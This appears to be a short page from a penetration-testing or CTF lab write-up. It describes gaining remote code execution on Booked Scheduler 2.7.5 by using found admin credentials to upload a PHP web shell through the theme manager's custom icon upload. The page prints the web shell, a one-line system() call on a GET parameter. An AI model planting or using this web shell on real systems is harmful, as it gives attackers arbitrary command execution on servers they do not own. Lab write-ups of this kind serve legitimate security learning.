Exploitation

LogoGitHub - F-Masood/Booked-Scheduler-2.7.5---RCE-Without-MSF: Exploiting Booked Scheduler 2.7.5 - RCE without MSF.GitHub

Following this tutorial i managed to upload a custom icon with the credentials found for the admin user.

I went to /Web/admin/manage_theme.php

Uploaded this backdoor.php

<pre>
<?php
system($_GET['cmd']);
?>
</pre>

Navigate to custom-favicon.php file, give some command as input and you have achieved RCE. Wohoooo!!!

PreviousmySQLNextPriv Escalation

Last updated